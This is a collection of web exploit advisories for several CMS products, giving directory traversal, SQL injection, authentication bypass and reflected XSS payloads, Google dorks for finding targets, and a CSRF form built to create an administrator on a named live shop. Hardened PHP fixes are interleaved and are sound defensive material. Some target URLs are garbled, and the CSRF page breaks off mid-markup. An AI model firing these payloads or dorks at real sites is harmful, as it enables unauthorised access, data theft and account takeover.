<pre><code>====================================================================================================================================<br />| # Title : KPOT Stealer CMS v2.0 Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md | <br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] infected file: download.php<br /><br /> <?php<br /> if (isset($_GET['file']))<br /> {<br /> $file = $_GET['file']; // taken from the query string with no validation<br /> header('Content-Disposition: attachment; filename="'.basename($file).'"'); // basename() is applied to the header only<br /> header('Content-Length: ' . filesize($file)); // the raw path, including any ../ segments, reaches the filesystem here<br /> readfile($file);<br /> }<br /> ?><br /><br />[+] use payload : download.php?file=../../../../../../../../../etc/passwd<br /><br />[+] http://127.0.0.1/KPOT/download.php?file=../../../../../../../../../etc/passwd<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : KPK CMS v1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit) | <br />| # Vendor : http://www.kpkcomputer.com/ | <br />| # Dork : "Developed by KPK Computer" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use Payload : user & pass = ' or 0=0 #<br /><br />[+] http://Targetthai-modeling-associationorg/admin/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Karenderia MRS v5.3 Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(64-bit) | <br />| # Vendor : https://github.com/ashishvazirani/food | <br />| # Dork : 1149 N GOWER ST, 90038 United States Call Us 111111111 |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use payload : /exportmanager/ajax/getfiles?f=/../../protected/config/main.php<br /><br />[+] http://127.0.0.1Trgtbastisapp.com/kmrs/exportmanager/ajax/getfiles?f=/../../protected/config/main.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
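A hardened replacement for the two traversal cases above: the KPOT download.php shown with its source, and the Karenderia getfiles?f= endpoint, which likewise serves a file named by a query parameter. This is an added example, not either vendor's code; the directory constant DOWNLOAD_DIR and the helper resolve_download() are assumptions.

```php
<?php
// Added example (not the vendors' code). The original download.php applies
// basename() only to the Content-Disposition header and passes the raw $file
// to filesize() and readfile(). Here the name is resolved inside one allowed
// directory and containment is checked before anything is read.
declare(strict_types=1);

const DOWNLOAD_DIR = __DIR__ . '/files'; // assumption: the only directory that may be served

/**
 * Resolve a user-supplied file name to an absolute path inside $baseDir,
 * or return null if it escapes that directory or does not exist.
 */
function resolve_download(string $requested, string $baseDir): ?string
{
    // Keep only the final path component: "../../etc/passwd" becomes "passwd".
    $name = basename($requested);
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    // realpath() collapses symlinks and ".." before the containment check,
    // so a symlink inside the directory that points outside it is rejected too.
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

if (!isset($_GET['file']) || !is_string($_GET['file'])) {
    http_response_code(400);
    exit('Missing file parameter');
}

$path = resolve_download($_GET['file'], DOWNLOAD_DIR);
if ($path === null) {
    // Log the rejected value for detection; do not echo it back to the client.
    error_log(sprintf('download.php rejected path %s from %s',
        json_encode($_GET['file']), $_SERVER['REMOTE_ADDR'] ?? '-'));
    http_response_code(404);
    exit('Not found');
}

header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
// Escape quotes and backslashes so a crafted file name cannot break the header value.
header('Content-Disposition: attachment; filename="' . addcslashes(basename($path), '"\\') . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

Rejected requests are written to the web server's error log, which gives a simple signal to alert on if traversal payloads like the ones above are being tried against the endpoint.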
<pre><code># Exploit Title: Academy LMS 6.2 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 29/08/2023<br /># Vendor: Creativeitem<br /># Vendor Homepage: https://creativeitem.com/<br /># Software Link: https://demo.creativeitem.com/academy/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /># CVE: CVE-2023-4974<br /># CWE: CWE-89 / CWE-74 / CWE-707<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data and modification of<br />data, and can crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br />Path: /academy/tutor/filter<br /><br />GET parameter 'price_min' is vulnerable to SQL Injection<br />GET parameter 'price_max' is vulnerable to SQL Injection<br /><br />https://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0<br /><br />---<br />Parameter: price_min (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0<br /><br />Parameter: price_max (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0<br />---<br /><br /><br />[-] Done<br /></code></pre>
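The fix for both SQL injection reports above, the Academy LMS price filter and the KPK CMS login bypass with ' or 0=0 #, is the same: validate the input type and bind values as parameters instead of concatenating them into the query. This is an added example, not Creativeitem's or KPK Computer's code; the table names tutors and admin_users, the function names and the use of an in-memory SQLite database (needs the pdo_sqlite extension) are assumptions.

```php
<?php
// Added example (not the vendors' code): the tutor price filter rebuilt with
// validation plus bound parameters, and the same pattern applied to an admin
// login so that "' or 0=0 #" is handled as a literal username.
// Assumed schema: tutors(id, name, hourly_price), admin_users(username, password_hash).
declare(strict_types=1);

/** Optional price bound: null when absent, exception for anything that is not a non-negative number. */
function parse_price(array $query, string $key): ?float
{
    if (!isset($query[$key]) || $query[$key] === '') {
        return null;
    }
    // A subquery such as (SELECT(0)FROM(SELECT(SLEEP(7)))a) is not a float and is
    // rejected here, before any SQL text is built.
    $v = is_string($query[$key]) ? filter_var($query[$key], FILTER_VALIDATE_FLOAT) : false;
    if ($v === false || $v < 0) {
        throw new InvalidArgumentException("$key must be a non-negative number");
    }
    return $v;
}

/** Equivalent of /academy/tutor/filter for the two price parameters. */
function find_tutors(PDO $db, array $query): array
{
    $min = parse_price($query, 'price_min');
    $max = parse_price($query, 'price_max');
    $sql = 'SELECT id, name, hourly_price FROM tutors WHERE 1 = 1';
    $params = [];
    if ($min !== null) {
        $sql .= ' AND hourly_price >= :min';
        $params[':min'] = $min;
    }
    if ($max !== null) {
        $sql .= ' AND hourly_price <= :max';
        $params[':max'] = $max;
    }
    // Only fixed SQL text reaches prepare(); user values travel as bound parameters.
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Admin login: the username is bound, so quote and comment characters have no SQL meaning. */
function check_login(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM admin_users WHERE username = :u LIMIT 1');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;
    }
    return password_verify($pass, $row['password_hash']);
}

// Constructed demo data in an in-memory SQLite database standing in for MySQL.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE tutors (id INTEGER PRIMARY KEY, name TEXT, hourly_price REAL)');
$db->exec("INSERT INTO tutors (name, hourly_price) VALUES ('Ada', 5), ('Bob', 12)");
$db->exec('CREATE TABLE admin_users (username TEXT, password_hash TEXT)');
$db->prepare('INSERT INTO admin_users VALUES (:u, :h)')
   ->execute([':u' => 'admin', ':h' => password_hash('correct horse battery', PASSWORD_DEFAULT)]);

printf("tutors between 1 and 9: %d\n", count(find_tutors($db, ['price_min' => '1', 'price_max' => '9'])));
printf("login with bypass string: %s\n", check_login($db, "' or 0=0 #", "' or 0=0 #") ? 'accepted' : 'rejected');
try {
    find_tutors($db, ['price_min' => '(SELECT(0)FROM(SELECT(SLEEP(7)))a)']);
} catch (InvalidArgumentException $ex) {
    printf("filter: %s\n", $ex->getMessage());
}
```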
<pre><code># Exploit Title: Academy LMS 6.2 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 29/08/2023<br /># Vendor: Creativeitem<br /># Vendor Homepage: https://creativeitem.com/<br /># Software Link: https://demo.creativeitem.com/academy/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4973<br /># CWE: CWE-79 - CWE-74 - CWE-707<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL in an email or instant message,<br />and can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br />Path: /academy/tutor/filter<br /><br />GET parameter 'searched_word' is vulnerable to XSS<br />GET parameter 'searched_tution_class_type[]' is vulnerable to XSS<br />GET parameter 'searched_price_type[]' is vulnerable to XSS<br />GET parameter 'searched_duration[]' is vulnerable to XSS<br /><br />https://website/academy/tutor/filter?searched_word=[XSS]&searched_tution_class_type%5B%5D=[XSS]&price_min=1&price_max=9&searched_price_type%5B%5D=[XSS]&searched_duration%5B%5D=[XSS]<br /><br /><br />XSS Payload:<br /><br />acoa5"><script>alert(1)</script>dyzs0<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Italia Mediasky CMS v2.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.bereewineshop.com/admin/ | <br />| # Dork : Mediasky - Lato Amministrativo |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] use payload : /admin/visimmagine.php?imgname=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E<br /><br />[+] http://www.127.0.0.9bereewineshopcom/admin/visimmagine.php?imgname=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
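Both reflected XSS reports above (the Academy LMS filter parameters and the Mediasky imgname parameter) come down to a query value being written into HTML without escaping: the acoa5"> payload closes a value="..." attribute and the imgname payload lands in page text. The example below is added here and is not Creativeitem's or Mediasky's code; the helper names, the form layout and the allowlist values for the list parameters are assumptions.

```php
<?php
// Added example (not the vendors' code): re-rendering the reflected search
// parameters with context-aware escaping, and restricting list parameters
// such as searched_duration[] to known options instead of echoing them.
declare(strict_types=1);

/** Escape for HTML text and for double-quoted attribute values; ENT_QUOTES also covers single quotes. */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Read a scalar query parameter as a string; arrays and missing keys become ''. */
function query_string(array $q, string $key): string
{
    return isset($q[$key]) && is_string($q[$key]) ? $q[$key] : '';
}

/** Read a list parameter (name[]) but keep only values from a fixed allowlist. */
function query_choices(array $q, string $key, array $allowed): array
{
    $raw = $q[$key] ?? [];
    if (!is_array($raw)) {
        $raw = [$raw];
    }
    return array_values(array_intersect(array_map('strval', $raw), $allowed));
}

/** For visimmagine.php?imgname=...: accept only a plain image file name, never reflect the raw value. */
function safe_image_name(string $name): ?string
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\.(?:png|jpe?g|gif)\z/', $name) === 1 ? $name : null;
}

function render_filter_form(array $q): string
{
    $word      = query_string($q, 'searched_word');
    $types     = query_choices($q, 'searched_tution_class_type', ['1', '2']);
    $priceType = query_choices($q, 'searched_price_type', ['hourly', 'fixed']);
    $durations = query_choices($q, 'searched_duration', ['0', '1', '2']);

    $html = '<form method="get" action="/academy/tutor/filter">' . "\n";
    // Attribute context: a double quote in the input becomes &quot;, so the
    // attribute cannot be closed early and no <script> element is created.
    $html .= '  <input type="text" name="searched_word" value="' . e($word) . '">' . "\n";
    foreach ([['searched_tution_class_type', $types], ['searched_price_type', $priceType],
              ['searched_duration', $durations]] as [$name, $values]) {
        foreach ($values as $v) {
            // Values come from the allowlist, but escape anyway: one rule for every output.
            $html .= '  <input type="hidden" name="' . e($name) . '[]" value="' . e($v) . '">' . "\n";
        }
    }
    // Text context: the search term shown back to the user.
    $html .= '  <p>Results for: ' . e($word) . '</p>' . "\n";
    return $html . "</form>\n";
}

// Constructed input: the payload from the report in the text field, plus junk in a list field.
$demo = [
    'searched_word'              => 'acoa5"><script>alert(1)</script>dyzs0',
    'searched_tution_class_type' => ['1', '"><script>alert(1)</script>'],
    'searched_price_type'        => ['hourly'],
    'searched_duration'          => ['0'],
];
header('Content-Type: text/html; charset=UTF-8');
// Defence in depth for anything missed: a CSP without 'unsafe-inline' blocks injected inline scripts.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");
echo render_filter_form($demo);

// The Mediasky case: a name that is not a plain image file name is dropped, not displayed.
$img = safe_image_name('1\'"()&%<acx><ScRiPt >prompt(/indoushka/)</ScRiPt>');
echo $img === null ? "<p>Image not found</p>\n" : '<img src="/images/' . e($img) . '">' . "\n";
```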
<pre><code>====================================================================================================================================<br />| # Title : Italia Mediasky CMS v2.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.bereewineshop.com/admin/ | <br />| # Dork : Mediasky - Lato Amministrativo |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] The following HTML code creates a new admin.<br /><br />[+] Go to lines 18 and 19.<br /><br />[+] Set the target site link, save the changes and apply. <br /><br />[+] infected file : /admin/reginsuseradmin.php<br /><br />[+] infected file : /admin/visuseradmin.php<br /><br /><br /> <!DOCTYPE html><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head profile="http://www.w3.org/2005/10/profile"><br /></div><br /><script type="text/javascript"><br /><script data-ad-client="ca-pub-3759463646787718" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /></script><br /> <div class="mainrow"><br /> <div style="float:left;"><h1><b>INSERISCI USER ADMIN</b>:&nbsp;&nbsp;<b style="color:#ff0000;"> </b></h1></div><br /> <br /> <div style="float:left;"><img style="float:left;margin-left:20px;" src="../skin/admingrey/images/mod.png" border="0px" alt="Modifica" title="Modifica"><h2><a href="moduseradmin.php?idaction=2293">Modifica</a></h2></div> <br /> <div style="float:left;"><img style="float:left;margin-left:20px;" src="../skin/admingrey/images/noarch.png" border="0px" alt="Modifica" title="Modifica"><h2><a href="javascript:void(0)" onclick="showhidediv('actionrequest');createLink('urlrequest','Conferma','archuseradmin.php?idaction=')">Ripristina</a></h2></div> <br /> <div 
style="float:left;"><img style="float:left;margin-left:20px;" src="../skin/admingrey/images/canc.png" border="0px" alt="Modifica" title="Modifica"><h2><a href="javascript:void(0)" onclick="showhidediv('actionrequest');createLink('urlrequest','Conferma','cancuseradmin.php?idaction=')">Cancella</a></h2></div> <br /> </div><br /><br /> <!-- TABELLA MODIFICA RECORD --><br /> <div id="maintable"><br /><form name="formprod" action="http://www127.0.0.1bereewineshopcom/admin/reginsuseradmin.php?menu=5&idsez=5" method="post" onsubmit="return checkFormPaneluser(this);"><br /><input type="hidden" name="ritorno" value="http://www.127.0.0.1/ereewineshopcom/admin/visuseradmin.php?idsez=5&menu=5"/> <br /><table class="formdati"><br /> <tbody><br /> <tr><br /> <td class="coldati"> </td><br /> <td><b style="color:#0051a3;font-size:16px;">DETTAGLIO USER ADMIN</b></td><br /> </tr> <br /> <tr><br /> <td class="coldati">Cognome </td><br /> <td><input type="text" name="admin_pu_cognome" /></td><br /> </tr> <br /> <tr><br /> <td class="coldati">Nome </td><br /> <td><input type="text" name="admin_pu_nome" /></td><br /> </tr><br /><tr><br /> <td class="coldati">Tel.Fisso </td><br /> <td><input type="text" name="admin_pu_telefono" /></td><br /> </tr><br /><tr><br /> <td class="coldati">Cellulare </td><br /> <td><input type="text" name="admin_pu_cellulare" /></td><br /> </tr><br /><tr><br /> <td class="coldati">Indirizzo </td><br /> <td><input type="text" name="admin_pu_indirizzo" /></td><br /> </tr> <br /> <tr><br /> <td class="coldati">Username </td><br /> <td><input type="text" name="admin_pu_user" /></td><br /> </tr> <br /> <tr><br /> <td class="coldati">Password </td><br /> <td><input type="password" name="admin_pu_pass" /></td><br /> </tr><br /> <tr><br /> <td class="coldati">Riscrivi Password </td><br /> <td><input type="password" name="admin_pu_pass2" /></td> <br /> </tr><br /> <tr><br /> <td class="coldati">Email </td><br /> <td><input type="text" name="admin_pu_email" /></td><br /> 
</tr><br /> <tr><br /> <td class="coldati">Attivo(si/No) </td><br /> <td><input type="checkbox" name="admin_pu_attivo" checked="checked" style="width:15px;" /></td><br /> </tr><br /> <br /> </tbody><br /></table><br /> <div style="text-align:center;margin:10px;"><b style="color:#0051a3;font-size:16px;">ELENCO PERMESSI ATTIVI PER SEZIONE</b></div> <br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>HOME</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>GESTIONE CONTENUTI</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Metatag Generici</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_1" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_1" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_1" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select 
name="sez_arc_1" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_1" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Pagine Web</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_2" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_2" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_2" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_2" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_2" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Prodotti</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_15" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_15" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option 
value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_15" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_15" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_15" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Prodotti - Specifiche</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_18" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_18" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_18" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_18" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_18" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Prodotti - Sezioni</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_16" 
style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_16" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_16" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_16" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_16" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Prodotti - Produttori</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_19" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_19" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_19" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_19" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_19" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> 
</h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Prodotti - Recensioni</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_20" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_20" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_20" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_20" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_20" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Prodotti - Denominazioni</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_28" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_28" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_28" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_28" style="height:20px;width:50px;font-size:12px;"><option value="1" 
selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_28" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Prodotti - Provenienza</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_29" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_29" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_29" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_29" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_29" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Slideshow Immagini</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_21" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_21" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_21" 
